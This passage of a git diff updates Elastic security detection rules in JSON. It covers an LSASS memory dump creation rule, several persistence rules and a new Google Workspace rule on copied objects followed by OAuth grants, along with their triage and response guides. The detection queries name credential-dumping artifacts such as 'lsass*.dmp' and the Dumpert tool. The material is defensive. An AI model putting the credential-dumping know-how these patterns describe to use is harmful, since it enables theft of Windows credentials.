4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_106.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_106.json index 13198bac173..ba3b6871898 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_107.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_107.json index c457361231b..362ef189aba 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and\n file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\"\n ) and\n file.path : (\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\MSSQL\\\\LOG\\\\SQLDmpr*.mdmp\"\n )\n ) and\n\n not (\n process.executable : \"?:\\\\Windows\\\\system32\\\\WerFault.exe\" and\n file.path : (\n \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\",\n \"?:\\\\Windows\\\\System32\\\\%LOCALAPPDATA%\\\\CrashDumps\\\\lsass.exe.*.dmp\"\n )\n )\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_102.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_102.json index 08790ae1b87..154b55c7fd5 100644 --- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_103.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_103.json index 48ce6e70a8c..2fdf4f9c26a 100644 --- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_104.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_104.json index 4f76c7c3936..83cb71bf3e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_205.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_205.json index 643f1897c2c..5860cc69d39 100644 --- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_205.json +++ b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_1.json index b98034e0622..c5ca7b454d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_1.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_2.json index d422c79a397..b7dc7d9d133 100644 --- a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_2.json @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_3.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_3.json index 312f3fb6ae2..6b239bb6b9b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_3.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_4.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_4.json new file mode 100644 index 00000000000..07e4c5e39d9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_4.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user copies a Google spreadsheet, form, document or script from an external drive. Sequence logic has been added to also detect when a user grants a custom Google application permission via OAuth shortly after. An adversary may send a phishing email to the victim with a Drive object link where \"copy\" is included in the URI, thus copying the object to the victim's drive. If a container-bound script exists within the object, execution will require permission access via OAuth in which the user has to accept.", + "false_positives": [ + "Google Workspace users typically share Drive resources with a shareable link where parameters are edited to indicate when it is viewable or editable by the intended recipient. It is uncommon for a user in an organization to manually copy a Drive object from an external drive to their corporate drive. This may happen where users find a useful spreadsheet in a public drive, for example, and replicate it to their Drive. It is uncommon for the copied object to execute a container-bound script either unless the user was intentionally aware, suggesting the object uses container-bound scripts to accomplish a legitimate task." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "eql", + "license": "Elastic License v2", + "name": "Google Workspace Object Copied from External Drive and Access Granted to Custom Application", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Resource Copied from External Drive and Access Granted to Custom Application\n\nGoogle Workspace users can share access to Drive objects such as documents, sheets, and forms via email delivery or a shared link. Shared link URIs have parameters like `view` or `edit` to indicate the recipient's permissions. The `copy` parameter allows the recipient to copy the object to their own Drive, which grants the object with the same privileges as the recipient. Specific objects in Google Drive allow container-bound scripts that run on Google's Apps Script platform. Container-bound scripts can contain malicious code that executes with the recipient's privileges if in their Drive.\n\nThis rule aims to detect when a user copies an external Drive object to their Drive storage and then grants permissions to a custom application via OAuth prompt.\n\n#### Possible investigation steps\n- Identify user account(s) associated by reviewing `user.name` or `source.user.email` in the alert.\n- Identify the name of the file copied by reviewing `file.name` as well as the `file.id` for triaging.\n- Identify the file type by reviewing `google_workspace.drive.file.type`.\n- With the information gathered so far, query across data for the file metadata to determine if this activity is isolated or widespread.\n- Within the OAuth token event, identify the application name by reviewing `google_workspace.token.app_name`.\n - Review the application ID as well from `google_workspace.token.client.id`.\n - This metadata can be used to report the malicious application to Google for permanent blacklisting.\n- Identify the permissions granted to the application by the user by reviewing `google_workspace.token.scope.data.scope_name`.\n - This information will help pivot and triage into what services may have been affected.\n- If a container-bound script was attached to the copied object, it will also exist in the user's drive.\n - This object should be removed from all users affected and investigated for a better understanding of the malicious code.\n\n### False positive analysis\n- Communicate with the affected user to identify if these actions were intentional\n- If a container-bound script exists, review code to identify if it is benign or malicious\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the 